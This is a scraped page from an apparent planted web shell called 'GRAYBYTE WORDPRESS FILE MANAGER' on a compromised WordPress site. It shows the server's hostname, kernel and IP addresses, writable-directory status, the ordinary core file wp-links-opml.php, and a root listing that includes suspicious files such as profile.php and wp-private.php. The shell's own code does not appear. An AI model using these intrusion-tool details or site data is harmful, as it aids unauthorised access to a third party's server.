✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ business94.web-hosting.com ​🇻​♯➤ 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 162.0.209.198 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.114
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/hubcsyrx/oca.hubcity.africa//wp-links-opml.php
<?php
/**
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 */

require_once __DIR__ . '/wp-load.php';

header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
$link_cat = '';
if ( ! empty( $_GET['link_cat'] ) ) {
	$link_cat = $_GET['link_cat'];
	if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) {
		$link_cat = absint( urldecode( $link_cat ) );
	}
}

echo '<?xml version="1.0"?' . ">\n";
?>
<opml version="1.0">
	<head>
		<title>
		<?php
			/* translators: %s: Site title. */
			printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) );
		?>
		</title>
		<dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated>
		<?php
		/**
		 * Fires in the OPML header.
		 *
		 * @since 3.0.0
		 */
		do_action( 'opml_head' );
		?>
	</head>
	<body>
<?php
if ( empty( $link_cat ) ) {
	$cats = get_categories(
		array(
			'taxonomy'     => 'link_category',
			'hierarchical' => 0,
		)
	);
} else {
	$cats = get_categories(
		array(
			'taxonomy'     => 'link_category',
			'hierarchical' => 0,
			'include'      => $link_cat,
		)
	);
}

foreach ( (array) $cats as $cat ) :
	/** This filter is documented in wp-includes/bookmark-template.php */
	$catname = apply_filters( 'link_category', $cat->name );

	?>
<outline type="category" title="<?php echo esc_attr( $catname ); ?>">
	<?php
	$bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) );
	foreach ( (array) $bookmarks as $bookmark ) :
		/**
		 * Filters the OPML outline link title text.
		 *
		 * @since 2.2.0
		 *
		 * @param string $title The OPML outline title text.
		 */
		$title = apply_filters( 'link_title', $bookmark->link_name );
		?>
<outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated="
							<?php
							if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) {
								echo $bookmark->link_updated;
							}
							?>
" />
		<?php
	endforeach; // $bookmarks
	?>
</outline>
	<?php
endforeach; // $cats
?>
</body>
</opml>


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
8 Jun 2026 12.27 AM
hubcsyrx / hubcsyrx
0711
mirror-nginx-cache
--
9 Jun 2026 4.04 AM
hubcsyrx / hubcsyrx
0755
wordpress
--
9 Jun 2026 3.59 AM
hubcsyrx / hubcsyrx
0755
wp-admin
--
9 Jun 2026 3.59 AM
hubcsyrx / hubcsyrx
0755
wp-content
--
9 Jun 2026 7.12 PM
hubcsyrx / hubcsyrx
0755
wp-includes
--
9 Jun 2026 3.59 AM
hubcsyrx / hubcsyrx
0755
.hcflag
0.029 KB
8 Jun 2026 11.30 PM
hubcsyrx / hubcsyrx
0644
.litespeed_flag
0.29 KB
9 Jun 2026 1.34 AM
hubcsyrx / nobody
0644
index.php
0.396 KB
6 Feb 2020 11.33 AM
hubcsyrx / hubcsyrx
0644
license.txt
19.437 KB
1 Jan 2026 5.07 AM
hubcsyrx / hubcsyrx
0644
profile.php
69.722 KB
9 Jun 2026 5.11 AM
hubcsyrx / hubcsyrx
0644
readme.html
7.232 KB
9 Jan 2026 4.47 PM
hubcsyrx / hubcsyrx
0644
wp-activate.php
7.198 KB
17 Feb 2026 10.05 PM
hubcsyrx / hubcsyrx
0644
wp-blog-header.php
0.343 KB
6 Feb 2020 11.33 AM
hubcsyrx / hubcsyrx
0644
wp-comments-post.php
2.269 KB
14 Jun 2023 6.11 PM
hubcsyrx / hubcsyrx
0644
wp-config-sample.php
3.261 KB
12 Aug 2025 6.47 PM
hubcsyrx / hubcsyrx
0644
wp-config.php
3.913 KB
9 Jun 2026 4.01 AM
hubcsyrx / hubcsyrx
0644
wp-cron.php
5.485 KB
2 Aug 2024 11.40 PM
hubcsyrx / hubcsyrx
0644
wp-links-opml.php
2.435 KB
30 Apr 2025 4.52 PM
hubcsyrx / hubcsyrx
0644
wp-load.php
3.845 KB
11 Mar 2024 2.05 PM
hubcsyrx / hubcsyrx
0644
wp-mail.php
8.522 KB
3 Apr 2025 2.25 AM
hubcsyrx / hubcsyrx
0644
wp-private.php
52.281 KB
8 Jun 2026 10.45 PM
hubcsyrx / hubcsyrx
0444
wp-settings.php
31.885 KB
8 May 2026 7.59 PM
hubcsyrx / hubcsyrx
0644
wp-signup.php
33.81 KB
17 Feb 2026 10.05 PM
hubcsyrx / hubcsyrx
0644
wp-trackback.php
5.092 KB
19 Aug 2025 4.30 PM
hubcsyrx / hubcsyrx
0644
xmlrpc.php
3.13 KB
8 Nov 2024 8.52 PM
hubcsyrx / hubcsyrx
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF